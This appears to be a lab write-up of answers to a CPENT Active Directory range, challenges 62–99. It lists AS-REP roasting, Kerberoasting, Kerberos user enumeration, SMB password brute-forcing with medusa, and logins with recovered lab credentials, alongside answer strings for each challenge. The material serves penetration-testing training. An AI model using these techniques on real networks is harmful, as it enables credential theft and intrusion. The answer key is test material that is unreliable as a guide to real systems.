# AD Range

## Environment

### CPENT.LOCALNET0(172.25.170.12)
* ![image](https://hackmd.io/_uploads/rJ4Ser-qlg.png)

### CPENTV2.LOCALNET(172.25.170.25)
* ![image](https://hackmd.io/_uploads/Sk_tgrZ5lx.png)

### ECC.LOCALNET(170.25.170.80)
* ![image](https://hackmd.io/_uploads/rJDjeHW5ee.png)

### 172.25.170.110
* ![image](https://hackmd.io/_uploads/r1Lperb9ex.png)

### CPENT.LOCALNET(172.25.170.150)
* ![image](https://hackmd.io/_uploads/ryZebrbqxx.png)

### SERVER2008.CPENT.LOCALNET(172.25.170.170)
* ![image](https://hackmd.io/_uploads/B1JXFNBsll.png)

### LPT.COM0(172.25.170.190)
* ![image](https://hackmd.io/_uploads/SJZf-BWcgx.png)

### CPENT.LOCALNET0(172.25.170.200)
* ![image](https://hackmd.io/_uploads/BkF4ZBZ5ge.png)

## Challenge 62
![image](https://hackmd.io/_uploads/rJGAp4Z9gl.png)
* Use `GetNPUsers.py` to enumerate the users for SPN
* ![image](https://hackmd.io/_uploads/SyaP_HZqex.png)

```zsh=
GetNPUsers.py LPT.COM/ -dc-ip 172.25.170.190 -usersfile Usernames.txt -format hashcat -outputfile hashes.txt | grep User
```
* Answer:`user-one`

## Challenge 63
![image](https://hackmd.io/_uploads/rkCadHb9xx.png)

```zsh=
nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm='LPT.COM0',userdb=Usernames.txt 172.25.170.190
```
* Answer:`krb5-enum-users.realm`

## Challenge 64
![image](https://hackmd.io/_uploads/Hk1zoHbqee.png)
* Answer:`DnsUpdateProxy`

## Challenge 65
![image](https://hackmd.io/_uploads/BkvPmwZcxg.png)
* Answer:`cpent`

## Challenge 66
![image](https://hackmd.io/_uploads/r1xKmv-qgl.png)
* ![image](https://hackmd.io/_uploads/BkVqTTv5ll.png)

```powershell=
Get-NetForestDomain
Get-NetDomainTrust
```
* Answer:`LA`

## Challenge 67
![image](https://hackmd.io/_uploads/SJsN8Pbcll.png)
* ![image](https://hackmd.io/_uploads/r11U0aDqel.png)

```powershell=
Get-NetForestTrust
```
* Answer:`ECC`

## Challenge 68
![image](https://hackmd.io/_uploads/BJjzm6P9gg.png)
* ![image](https://hackmd.io/_uploads/BkVqTTv5ll.png)
* Answer:`LA`

## Challenge 69
![image](https://hackmd.io/_uploads/BkJ8mpPqee.png)
* Answer:

## Challenge 70
![image](https://hackmd.io/_uploads/Bk8clWdcge.png)
* Answer:

## Challenge 71
![image](https://hackmd.io/_uploads/rysjgb_5gg.png)
* Answer:

## Challenge 72
![image](https://hackmd.io/_uploads/B1bplZd9gx.png)
* ![image](https://hackmd.io/_uploads/SJcGZ-dqll.png)
* Answer:`172.25.170.25`

## Challenge 73
![image](https://hackmd.io/_uploads/H1MtW-dqge.png)
* ![image](https://hackmd.io/_uploads/S1-a-ZOcgg.png)
* Answer:`AD-WIN`

## Challenge 74
![image](https://hackmd.io/_uploads/By5kf-_cxl.png)
* ![image](https://hackmd.io/_uploads/By3Hj-_qll.png)

```zsh=
GetUserSPNs.py -request -dc-ip 172.25.170.25 CPENTV2.LOCALNET/administrator:'CPENT@@2024@@2024' | grep -i 'POP3'
```
* Answer:`Pablo Baker`

## Challenge 75
![image](https://hackmd.io/_uploads/S1p_s-Ocll.png)
* ![image](https://hackmd.io/_uploads/SyAqs-Oqel.png)
* Answer:`Clint Franks`

## Challenge 76
![image](https://hackmd.io/_uploads/S190sbO9le.png)
* Answer:

## Challenge 77
![image](https://hackmd.io/_uploads/SJQEyzdqee.png)
* ![image](https://hackmd.io/_uploads/rJGIkGd9gl.png)
* Answer:`Bernice Lott`

## Challenge 78
![image](https://hackmd.io/_uploads/HkWqxf_9xe.png)
* ![image](https://hackmd.io/_uploads/ryswrM_qlx.png)
* Answer:`BB9`

## Challenge 79
![image](https://hackmd.io/_uploads/rJGzUfO5lg.png)
* ![image](https://hackmd.io/_uploads/SyLEnzucge.png)

```powershell=
Get-Command ExSetup.exe | ForEach-Object { $_.FileVersionInfo }
```
* https://learn.microsoft.com/zh-tw/exchange/new-features/build-numbers-and-release-dates
* ![image](https://hackmd.io/_uploads/HkVBY7Bsgg.png)
* Answer:`12`

## Challenge 80
![image](https://hackmd.io/_uploads/r1Uqq7Sole.png)
* ![image](https://hackmd.io/_uploads/Sy0GTXrsgl.png)
* Answer:`address`

## Challenge 81
![image](https://hackmd.io/_uploads/BJlOXPW_cll.png)
* ![image](https://hackmd.io/_uploads/HkR4D-uqlx.png)
* Answer:`CPENTV2.LOCALNET`

## Challenge 82
![image](https://hackmd.io/_uploads/S1RqT7Hjgx.png)
* ![image](https://hackmd.io/_uploads/HJzc0XHogg.png)
* Answer:`2012`

## Challenge 83
![image](https://hackmd.io/_uploads/r1eSJEHsgl.png)
* ![image](https://hackmd.io/_uploads/HyqDyEBolg.png)
* Answer:`Enabled`

## Challenge 84
![image](https://hackmd.io/_uploads/SkujGVBixg.png)
* ![image](https://hackmd.io/_uploads/B1gw2GEBsxl.png)
* Answer:`WS2012-ADUSER`

## Challenge 85
![image](https://hackmd.io/_uploads/Hk1CMVHsxl.png)
* ![image](https://hackmd.io/_uploads/SJDbQNBolx.png)
* Answer:`WS2012-ADROOT`

## Challenge 86
![image](https://hackmd.io/_uploads/By8d7EHole.png)
* Answer:`2008`

## Challenge 87
![image](https://hackmd.io/_uploads/SyU7NVrjee.png)
* Answer:`Disabled`

## Challenge 88
![image](https://hackmd.io/_uploads/SkaSV4Hiex.png)
* Host 170 blocks ICMP; brute-forcing with tools such as `nxc` times out immediately, so use `medusa` instead
* ![image](https://hackmd.io/_uploads/S1_3j4Ujge.png)

```zsh=
medusa -h 172.25.170.170 -u administrator -P Passwords.txt -M smbnt
```
* Then connect with `rpcclient`
* ![image](https://hackmd.io/_uploads/HyemhVUoge.png)

```zsh=
rpcclient -U 'administrator%Pa$$w0rd123456' 172.25.170.170
```
* Fetch the files with `smbclient`
* ![image](https://hackmd.io/_uploads/BkH16NIjxx.png)
* ![image](https://hackmd.io/_uploads/ryqb6VIoxx.png)
* Answer:`WS2008-User`

## Challenge 89
![image](https://hackmd.io/_uploads/S13P4VSogl.png)
* Answer:`WS2008-Admin`

## Challenge 90
![image](https://hackmd.io/_uploads/ryZtEVHsxx.png)
* ![image](https://hackmd.io/_uploads/HysQSNSoel.png)
* Answer:`Desktop5-user`

## Challenge 91
![image](https://hackmd.io/_uploads/ByHvSESige.png)
* ![image](https://hackmd.io/_uploads/HysQSNSoel.png)
* Answer:`Desktop5-root`

## Challenge 92
![image](https://hackmd.io/_uploads/BJ1nHNSill.png)
* ![image](https://hackmd.io/_uploads/HJ1AL4Holx.png)
* Answer:`CPENT`

## Challenge 93
![image](https://hackmd.io/_uploads/Hyc7vEBsll.png)
* ![image](https://hackmd.io/_uploads/HJ1AL4Holx.png)
* Answer:`user-one`

## Challenge 94
![image](https://hackmd.io/_uploads/HJTUvVrsex.png)
* ![image](https://hackmd.io/_uploads/BJjRdErsxx.png)
* Answer:`RemoteSigned`

## Challenge 95
![image](https://hackmd.io/_uploads/HyuWd4Hoxg.png)
* ![image](https://hackmd.io/_uploads/HJm4dNSigx.png)
* Answer:`AD-WIN2019-ADMI`

## Challenge 97
![image](https://hackmd.io/_uploads/Bk9fSb_cgl.png)
* ![image](https://hackmd.io/_uploads/rJwmrZuqgx.png)

```powershell=
Get-ADForest | Select-Object -ExpandProperty Domains
```
* Answer:`ECC.LOCALNET`

## Challenge 98
![image](https://hackmd.io/_uploads/rJT1Lb_5lg.png)
* ![image](https://hackmd.io/_uploads/BkByLbOcge.png)
* Answer:`Required`

## Challenge 99
![image](https://hackmd.io/_uploads/HJZV4Zucge.png)
* ![image](https://hackmd.io/_uploads/r1CNEZ_cgl.png)
* Answer:`WS-AD-TWO-USER`